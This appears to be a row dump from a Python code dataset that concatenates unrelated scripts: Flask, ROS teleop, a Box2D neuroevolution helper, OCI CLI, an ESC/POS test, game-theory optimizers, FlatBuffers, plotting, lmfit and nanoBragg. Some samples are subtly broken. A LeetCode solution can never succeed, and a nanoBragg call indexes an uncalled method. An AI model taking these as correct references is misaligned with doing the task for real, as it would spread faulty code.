content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
from flask import Flask
app = Flask(__name__)
@app.route('/hello/<name>')
def hello(name: str) -> str:
return f"Hello {name}!"
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
import sys, select, termios, tty, rospy
import curses
msg = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving options:
---------------------------
w -- up (+z)
s -- down (-z)
a -- counter clockwise yaw
d -- clockwise yaw
up arrow -- forward (+x)
down arrow -- backward (-x)
<- -- forward (+y)
-> -- backward (-y)
CTRL-C to quit
"""
print msg
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.2)
if rlist:
key = sys.stdin.read(1)
### if using arrow keys, need to retrieve 3 keys in buffer
if ord(key) == 27:
key = sys.stdin.read(1)
if ord(key) == 91:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('teleop_twist_keyboard')
pub = rospy.Publisher('~cmd_vel', Twist, queue_size = 1)
v = rospy.get_param("~v", 2.0)
w = rospy.get_param("~w", 1.0)
rate = rospy.Rate(20) # 10hz
while not rospy.is_shutdown():
vx = 0
vy = 0
vz = 0
wy = 0
key = getKey()
if key == 'w':
vx = v
elif key == 's':
vx = -v
elif key == 'a':
vy = v
elif key == 'd':
vy = -v
elif key=='A':
vz = v
elif key=='B':
vz = -v
elif key=='C':
wy = -w
elif key=='D':
wy = w
if (key == '\x03'):
break
twist = Twist()
twist.linear.x = vx; twist.linear.y = vy; twist.linear.z = vz;
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = wy
pub.publish(twist)
rate.sleep()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from Box2D.b2 import contactListener
from parameters import *
from creatures import Animatronic
class nnContactListener(contactListener):
def __init__(self):
contactListener.__init__(self)
self.sensors = dict()
def BeginContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 1.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = True
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 1.0
elif isinstance(f2.userData, Animatronic):
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = True
def EndContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 0.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = False
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 0.0
elif isinstance(f2.userData, Animatronic) and f2.userData.body.fixtures: # Weird
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = False
def registerSensors(self, id, n):
"""
Args:
id: Animatronic unique identifier
n: number of sensor to register
"""
self.sensors[id] = [0.0]*(n+1) # Last slot for body touching ground
def unregisterSensors(self, id):
del self.sensors[id]
def breed(creatures):
# This function is weird...
if len(creatures) < 2:
return []
offspring = []
p1 = creatures[0]
for p2 in creatures[1:]:
offspring.append(p1.breed(p2))
return offspring + breed(creatures[1:])
def cross(array1, array2):
assert(array1.shape == array2.shape)
new_list = []
a1, a2 = array1.flat, array2.flat
for i in range(array1.size):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_list.append(a1[i])
if r == 1:
# inherit from second parent
new_list.append(a2[i])
return np.array(new_list).reshape(array1.shape)
def cross2(array1, array2):
""" Cross function with whole genes instead of single nucleotides """
assert(array1.shape == array2.shape)
new_array = np.zeros_like(array1)
#a1, a2 = array1.flat, array2.flat
for i in range(array1.shape[1]):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_array[:,i] = array1[:,i].copy()
if r == 1:
# inherit from second parent
new_array[:,i] = array2[:,i].copy()
return new_array
def sigmoid(x):
return 1 / (1+np.exp(-x))
def tanh(x):
# Better than sigmoid for our purpose
return (np.exp(x)-np.exp(-x)) / (np.exp(x)+np.exp(-x))
def relu(x):
return np.maximum(x, np.zeros_like(x))
def sigmoid_derivative(x):
return x*(1-x)
class NeuralNetwork:
activations = { "tanh": tanh,
"sigmoid": sigmoid,
"sigmoid_derivative": sigmoid_derivative,
"relu": relu}
def __init__(self):
self.save_state = False # Keep calculated values of neurons after feedforward for display purposes
def init_weights(self, layers):
self.weights = []
for i in range(len(layers)-1):
# Fill neural network with random values between -1 and 1
self.weights.append(np.random.uniform(size=(layers[i]+1, layers[i+1]), low=-1, high=1))
#def set_weights(self, weights):
# self.weights = weights
def set_activation(self, activation):
self.activation = activation.lower()
self.activation_f = self.activations[self.activation]
def get_layers(self):
""" Returns number of neurons in each layer (input and output layers included)
"""
n = len(self.weights)
return [len(self.weights[i])-1 for i in range(n)] + [len(self.weights[-1][0])]
def get_total_neurons(self):
layers = self.get_layers()
return sum(layers)
def get_total_synapses(self):
return sum([w.size for w in self.weights])
def feedforward(self, x):
self.output = np.array(x+[1.0]) # Add the bias unit
if self.save_state:
self.state = []
self.state.append(self.output.copy())
for i in range(0, len(self.weights)-1):
self.output = self.activation_f(np.dot(self.output, self.weights[i]))
self.output = np.append(self.output, 1.0) # Add the bias unit
if self.save_state:
self.state.append(self.output.copy())
self.output = self.activation_f(np.dot(self.output, self.weights[-1]))
if self.save_state:
self.state.append(self.output)
def copy(self):
new_nn = NeuralNetwork()
weights = []
for w in self.weights:
weights.append(w.copy())
new_nn.weights = weights
new_nn.set_activation(self.activation)
return new_nn
def compare_weights(self, other):
assert self.get_layers() == other.get_layers(), "neural network architectures are different"
diff = []
mutations = 0
for i in range(len(self.weights)):
diff.append(self.weights[i] == other.weights[i])
mutations += sum(self.weights[i] != other.weights[i])
print("{} mutation(s) ({}%)".format(mutations, mutations / self.get_total_synapses()))
return diff
|
nilq/baby-python
|
python
|
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
import click
from services.waas.src.oci_cli_waas.generated import waas_cli
from oci_cli import cli_util
from oci_cli import custom_types # noqa: F401
from oci_cli import json_skeleton_utils
# oci waas purge-cache purge-cache --waas-policy-id, --resources
# to
# oci waas purge-cache --waas-policy-id, --resources
waas_cli.waas_root_group.commands.pop(waas_cli.purge_cache_group.name)
waas_cli.waas_root_group.add_command(waas_cli.purge_cache)
# oci waas custom-protection-rule-setting update-waas-policy-custom-protection-rules --update-custom-protection-rules-details, --waas-policy-id
# to
# oci waas custom-protection-rule update-setting --custom-protection-rules-details, --waas-policy-id
waas_cli.waas_root_group.commands.pop(waas_cli.custom_protection_rule_setting_group.name)
@cli_util.copy_params_from_generated_command(waas_cli.update_waas_policy_custom_protection_rules, params_to_exclude=['update_custom_protection_rules_details'])
@waas_cli.custom_protection_rule_group.command(name=cli_util.override('update_waas_policy_custom_protection_rules.command_name', 'update-setting'), help=waas_cli.update_waas_policy_custom_protection_rules.help)
@cli_util.option('--custom-protection-rules-details', required=True, type=custom_types.CLI_COMPLEX_TYPE, help=u"""""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'custom-protection-rules-details': {'module': 'waas', 'class': 'list[CustomProtectionRuleSetting]'}})
@cli_util.wrap_exceptions
def update_waas_policy_custom_protection_rules_extended(ctx, **kwargs):
if 'custom_protection_rules_details' in kwargs:
kwargs['update_custom_protection_rules_details'] = kwargs['custom_protection_rules_details']
kwargs.pop('custom_protection_rules_details')
ctx.invoke(waas_cli.update_waas_policy_custom_protection_rules, **kwargs)
# oci waas waas-policy-custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
# to
# oci waas waas-policy custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
waas_cli.waas_root_group.commands.pop(waas_cli.waas_policy_custom_protection_rule_group.name)
waas_cli.waas_policy_group.add_command(waas_cli.waas_policy_custom_protection_rule_group)
cli_util.rename_command(waas_cli.waas_policy_group, waas_cli.waas_policy_custom_protection_rule_group, "custom-protection-rule")
|
nilq/baby-python
|
python
|
""""""
from SSNRoom import SSNRoom
import json
class WallRoom(SSNRoom):
def __init__(self, room):
super().__init__(room)
# self._load()
self.wall_store = None
def _load(self):
self.wall_store = json.loads(self.room.topic)
print("hi")
# room_events = self.room.get_events()
# events_ct = len(room_events)
# for i in range(0, events_ct):
# event = room_events.pop()
# if event['type'] == "m.room.message":
# text = event["content"]["body"]
# if "time_of_update" in text:
# wse = json.loads(event["content"]["body"])
# self.wall_store = wse
def get_wall_store(self):
return self.wall_store
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#
# escpostools/commands/cmd_test.py
#
# Copyright 2018 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from escpostools.aliases import resolve_alias
from escpostools.cli import pass_context
LONG_RULER = '....:....|' * 8
SHORT_RULER = '....:....|' * 4
@click.command('test', short_help='Runs tests against implementations.')
@click.argument('aliases', type=click.STRING)
@click.option('--all', is_flag=True, help='Run all predefined test sets')
@click.option('--align', is_flag=True, help='Run predefined alignment test set')
@click.option('--modes', is_flag=True, help='Run predefined modes test set')
@click.option('--rulers', is_flag=True, help='Run predefined rulers test set')
@pass_context
def cli(ctx, aliases, all, align, modes, rulers):
"""Runs predefined tests against one or more implementations, sending sets
of commands to the printer(s) throught associated connection method(s).
For this command to work you must assign at least one alias with an
implementation and connection method. See help for "assign" command. For
example, if you want to run "modes" and "align" tests against an
implementation aliased as "tmt20" you type:
\b
$ escpos test tmt20 --align --modes
Or you can run all predefined tests against three aliased implementations:
\b
$ escpos test rm22,tmt20,dr700 --all
"""
impls = [resolve_alias(alias_id) for alias_id in aliases.split(',')]
if all:
align = True
modes = True
rulers = True
for impl in impls:
if align:
_run_align(impl)
if modes:
_run_modes(impl)
if rulers:
_run_rulers(impl)
def _run_align(impl):
impl.init()
impl.text('[Aligment Tests]')
impl.lf()
impl.justify_right()
impl.text('Right Aligned')
impl.justify_center()
impl.text('Centered Text')
impl.justify_left()
impl.text('Left Aligned')
impl.lf(2)
impl.text('This long text paragraph should be left aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_center()
impl.text('This long text paragraph should be centered. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_right()
impl.text('This long text paragraph should be right aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_left()
impl.lf(2)
def _run_modes(impl):
impl.init()
impl.text('[Modes]')
impl.lf()
impl.text('Just normal text.')
impl.lf()
impl.text('Entering condensed...')
impl.set_condensed(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_condensed(False)
impl.text('Condensed mode OFF')
impl.lf()
impl.text('Entering expanded...')
impl.set_expanded(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_expanded(False)
impl.text('Expanded mode OFF')
impl.lf(2)
def _run_rulers(impl):
impl.init()
impl.text('[Rulers]')
impl.lf()
impl.text(LONG_RULER)
impl.lf(2)
impl.set_condensed(True)
impl.text(LONG_RULER)
impl.set_condensed(False)
impl.lf(2)
impl.set_expanded(True)
impl.text(SHORT_RULER)
impl.set_expanded(False)
impl.lf(2)
|
nilq/baby-python
|
python
|
# This is a preliminary version of the code
from typing import Any
import time
import torch
import numpy
from torch import Tensor
from torch import autograd
from torch.autograd import Variable
from torch.autograd import grad
def hessian_vec(grad_vec, var, retain_graph=False):
v = torch.ones_like(var)
vec, = autograd.grad(grad_vec, var, grad_outputs=v, allow_unused=True, retain_graph=retain_graph)
return vec
def hessian(grad_vec, var, retain_graph=False):
v = torch.eye(var.shape[0])
matrix = torch.cat([autograd.grad(grad_vec, var, grad_outputs=v_row, allow_unused=True, retain_graph=retain_graph)[0]
for v_row in v])
matrix = matrix.view(-1,var.shape[0])
return matrix
class Richardson(object):
def __init__(self, matrix, rhs, tol, maxiter, relaxation, verbose=False):
"""
:param matrix: coefficient matrix
:param rhs: right hand side
:param tol: tolerance for stopping criterion based on the relative residual
:param maxiter: maximum number of iterations
:param relaxation: relaxation parameter for Richardson
:param initial_guess: initial guess
:return: matrix ** -1 * rhs
"""
self.rhs = rhs
self.matrix = matrix
self.tol = tol
self.maxiter = maxiter
self.relaxation = relaxation
self.rhs_norm = torch.norm(rhs, 2)
self.iteration_count = 0
self.verbose = verbose
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, initial_guess):
## TODO: consider passing initial guess to solve()
residual = self.rhs - self.matrix @ initial_guess
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
solution = initial_guess
while relative_residual_norm > self.tol and self.iteration_count < self.maxiter:
## TODO: consider making all of these non-attributes and just return them
solution = solution + self.relaxation * residual
residual = self.rhs - torch.matmul(self.matrix, solution)
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
self.iteration_count += 1
self.print_verbose("Richardson converged in ", str(self.iteration_count), " iteration with relative residual norm: ",
str(relative_residual_norm), end='...')
# Do not return because it's already an attribute
return solution
"""
class Optimizer:
def __init__(self, iteration, tolerance, device="cpu"):
self.iter = iteration
self.tol = tolerance
self.dev = torch.device(device)
def solve(self):
raise NotImplementedError
class SpecialOptimizer(Optimizer):
def __init__(self, *args, **kwargs):
iteration, tolerance = args[:]
device = kwargs.get("device", "cpu")
super(SpecialOptimizer, self).__init__(iteration, tolerance, device=device)
## do something with args and kwargs ...
def solve(self):
pass
"""
class ConjugateGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-18, lr=1.0, verbose=True):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_eval = f(x, y)
g_eval = g(x, y)
grad_f_x = autograd.grad(f_eval, x, create_graph=True, allow_unused=True)
grad_g_y = autograd.grad(g_eval, y, create_graph=True, allow_unused=True)
new_x = x - self.lr * grad_f_x[0]
new_y = y - self.lr * grad_g_y[0]
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val = f(x, y)
g_val = g(x, y)
grad_f_x, = autograd.grad(f_val, x, create_graph=True, allow_unused=True)
grad_g_y, = autograd.grad(g_val, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy = hessian_vec(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian_vec(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
# The "*" multiplication operates elementwise
# We have to use the "*" and not the matmul method because we do NOT extract the entire Hessian matrix, we just
# extract the diagonal entries
#__x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_f_xy, __hess_g_yx))
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_f_xy * hess_g_yx)
#__y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_g_yx, __hess_f_xy))
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_g_yx * hess_f_xy)
else:
hess_f_xy = hessian(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_f_xy, hess_g_yx)
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_g_yx, hess_f_xy)
solver1 = Richardson(x_A, x_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_x = torch.randn(x_rhs.shape)
delta_x = solver1.solve(initial_guess_x)
solver2 = Richardson(y_A, y_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_y = torch.randn(y_rhs.shape)
delta_y = solver2.solve(initial_guess_y)
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy:", hess_f_xy)
self.print_verbose("hess_g_yx:", hess_g_yx)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradientJacobi(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y, delay=1):
x_buffer = []
y_buffer = []
f_history = []
g_history = []
x_history = []
y_history = []
prev_y = y.clone().detach().requires_grad_(True)
prev_x = x.clone().detach().requires_grad_(True)
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val_x = f(x, prev_y)
f_val_y = f(prev_x, y)
g_val_x = g(x, prev_y)
g_val_y = g(prev_x, y)
grad_f_x_x, = autograd.grad(f_val_x, x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_f_x_y, = autograd.grad(f_val_y, prev_x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_g_y_x, = autograd.grad(g_val_x, prev_y, create_graph=True, allow_unused=True)
grad_g_y_y, = autograd.grad(g_val_y, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy_x = hessian_vec(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian_vec(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian_vec(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian_vec(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * hess_f_xy_x * grad_g_y_x)
delta_y = -self.lr * (grad_g_y_y + 2 * hess_g_yx_y * grad_f_x_y)
else:
hess_f_xy_x = hessian(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * torch.matmul(hess_f_xy_x, grad_g_y_x))
delta_y = -self.lr * (grad_g_y_y + 2 * torch.matmul(hess_g_yx_y, grad_f_x_y))
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
x_buffer.append(x)
y_buffer.append(y)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy_x:", hess_f_xy_x)
self.print_verbose("hess_f_xy_y:", hess_f_xy_y)
self.print_verbose("hess_g_yx_x:", hess_g_yx_x)
self.print_verbose("hess_g_yx_y:", hess_g_yx_y)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
if self.iter_count > delay:
prev_y = y_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
prev_x = x_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
return f_history, g_history, x_history, y_history
|
nilq/baby-python
|
python
|
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: DeepSeaScene
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class SubpassDependency(object):
__slots__ = ['_tab']
@classmethod
def SizeOf(cls):
return 28
# SubpassDependency
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# SubpassDependency
def SrcSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0))
# SubpassDependency
def SrcStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(4))
# SubpassDependency
def SrcAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# SubpassDependency
def DstSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(12))
# SubpassDependency
def DstStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16))
# SubpassDependency
def DstAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(20))
# SubpassDependency
def RegionDependency(self): return self._tab.Get(flatbuffers.number_types.BoolFlags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(24))
def CreateSubpassDependency(builder, srcSubpass, srcStages, srcAccess, dstSubpass, dstStages, dstAccess, regionDependency):
builder.Prep(4, 28)
builder.Pad(3)
builder.PrependBool(regionDependency)
builder.PrependUint32(dstAccess)
builder.PrependUint32(dstStages)
builder.PrependUint32(dstSubpass)
builder.PrependUint32(srcAccess)
builder.PrependUint32(srcStages)
builder.PrependUint32(srcSubpass)
return builder.Offset()
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_selection import mutual_info_classif
def draw_cat_plot(df: pd.DataFrame, id_var: str, cat_feats: list, *, output_filename: str =None):
"""
Draw plot showing value counts of categorical features.
:parameter dframe: pandas dataframe containing the feature `id_var` and all of the features in `cat_feats`.
Note: this implementation does not check that all of the relevant features are in `dframe`.
:parameter id_var: Feature name (string) with respect to which panels of the categorical plot
are made. For instance, for a binary feature, the plot will
have two panels showing the respective counts of categorical features.
:parameter cat_feats: list of strings of categorical features to plot.
:parameter output_filename: if the plot is to be saved, this is its name.
(default=None, i.e., plot is not saved)
:return: Seaborn figure object.
"""
# Create DataFrame for cat plot using `pd.melt` using just the values from categorical features
df_cat = pd.melt(df, id_vars=id_var, value_vars=cat_feats)
# Draw the catplot
fig = sns.catplot(x="variable", hue="value", col=id_var, data=df_cat,
kind="count")
fig.set_xlabels('')
fig.set_xticklabels(rotation=90)
fig.savefig(output_filename) if output_filename is not None else True
return fig
def draw_corr_matrix(df: pd.DataFrame):
"""
- Draw correlation matrix as heatmap.
- Draw correlation for target feature and mutual information in a bar plot.
Note: Assuming the target feature is in the last column of df.
:parameter df: pandas dataframe with all of the relevant features as columns.
:return: fig: matplotlib figure object;
corr: correlation matrix for all features;
scores: pandas dataframe with the correlation and mutual information scores
for the target feature.
"""
target = df.columns[-1]
corr = df.corr() # Calculate the correlation matrix
target_corr = corr.loc[target, corr.columns.delete(-1)] # Correlation for the target
mi = mutual_info_classif(df.iloc[:, :-1], df[target]) # Calculate MI score
scores = target_corr.to_frame()
scores.rename(columns={target: "Corr"}, inplace=True)
scores["MI"] = mi
scores_melted = pd.melt(scores, ignore_index=False)
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True # Generate a mask for the upper triangle
fig, ax = plt.subplots(2, 1, figsize=(8, 15), dpi=100)
sns.heatmap(corr, mask=mask, square=True, ax=ax[0], cmap='Spectral_r',
annot=True, fmt='.2f', annot_kws={'fontsize': 8})
ax[0].set_title("Feature Correlation", fontdict={"fontsize": 14})
# Plot the "Cardio" correlation and mutual information scores on the sme graph.
sns.barplot(x="value", y=scores_melted.index, hue="variable",
data=scores_melted, ax=ax[1], palette='crest')
# sns.barplot(x=[np.array(cardio_corr), mi], y=cardio_corr.index, ax=ax[1],
# color=[0.30, 0.41, 0.29]) # to plot just the "Cardio" correlation scores
ax[1].set_title(f"Target ({target}) Correlation and Mutual Information",
fontdict={"fontsize": 14})
ax[1].set_xlabel(None)
ax[1].legend(title=None)
ax[1].grid(axis='x')
fig.savefig('Corr_matrix_Target.png')
return fig, corr, scores
|
nilq/baby-python
|
python
|
import numpy as np
from lmfit import Parameters, minimize, report_fit
from lmfit.models import LinearModel, GaussianModel
from lmfit.lineshapes import gaussian
def per_iteration(pars, iter, resid, *args, **kws):
"""iteration callback, will abort at iteration 23
"""
# print( iter, ', '.join(["%s=%.4f" % (p.name, p.value) for p in pars.values()]))
return iter == 23
def test_itercb():
x = np.linspace(0, 20, 401)
y = gaussian(x, amplitude=24.56, center=7.6543, sigma=1.23)
y = y - .20*x + 3.333 + np.random.normal(scale=0.23, size=len(x))
mod = GaussianModel(prefix='peak_') + LinearModel(prefix='bkg_')
pars = mod.make_params(peak_amplitude=21.0,
peak_center=7.0,
peak_sigma=2.0,
bkg_intercept=2,
bkg_slope=0.0)
out = mod.fit(y, pars, x=x, iter_cb=per_iteration)
assert(out.nfev == 23)
assert(out.aborted)
assert(not out.errorbars)
assert(not out.success)
|
nilq/baby-python
|
python
|
from typing import List
class Solution:
def maximum69Number (self, num: int) -> int:
ls = list('%d'%num)
ans = 0
try:
index = ls.index(6)
ls[index] = 9
for it in ls:
ans = ans * 10 + it
return ans
except ValueError as err:
ans = num
finally:
return ans
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function
from scitbx.array_family import flex # import dependency
from simtbx.nanoBragg import shapetype
from simtbx.nanoBragg import convention
from simtbx.nanoBragg import nanoBragg
import libtbx.load_env # possibly implicit
from cctbx import crystal
import os
# allow command-line options
GOFAST = False
import sys
if len(sys.argv)>1:
if sys.argv[1] == "fast":
print("SPEEDING UP! ")
GOFAST = True
# get the structure factor of spots
mtzfile = "model_nophase.mtz"
stolfile = "./bg.stol"
imgfile = "./F4_0_00008.mccd.gz"
# get stuff from the web if we have to
if not os.path.isfile(mtzfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+mtzfile
urllib.request.urlretrieve(url, mtzfile)
if not os.path.isfile(stolfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/bg.stol"
urllib.request.urlretrieve(url, stolfile)
if not os.path.isfile(imgfile):
from six.moves import urllib
url = "http://bl831.als.lbl.gov/~jamesh/simtbx/"+imgfile
urllib.request.urlretrieve(url, imgfile)
# make sure we got everything we need
assert os.path.isfile(mtzfile)
assert os.path.isfile(stolfile)
assert os.path.isfile(imgfile)
# read in structure factor amplitudes
from iotbx.reflection_file_reader import any_reflection_file
mtz_file = any_reflection_file(mtzfile)
Fhkl = mtz_file.as_miller_arrays()[0]
# get the structure factors of the background
Fbg_vs_stol = []
with open(stolfile, "rb") as fp:
for i in fp.readlines():
tmp = i.split(" ")
try:
Fbg_vs_stol.append((float(tmp[0]), float(tmp[1])))
except Exception:pass
# now Fbg_vs_stol is a list of stol,Fbg tuples
# open the existing diffraction image: we need it for the background profile
import dxtbx
img = dxtbx.load(imgfile)
panel = img.get_detector()[0]
pixel_size_mm = panel.get_pixel_size[0]
distance_mm = panel.get_distance()
#beam_center_mm =
# create the simulation
SIM = nanoBragg(img.get_detector(),img.get_beam(),verbose=6)
#SIM = nanoBragg(detpixels_slowfast=(4096,4096),pixel_size_mm=0.079346,verbose=9)
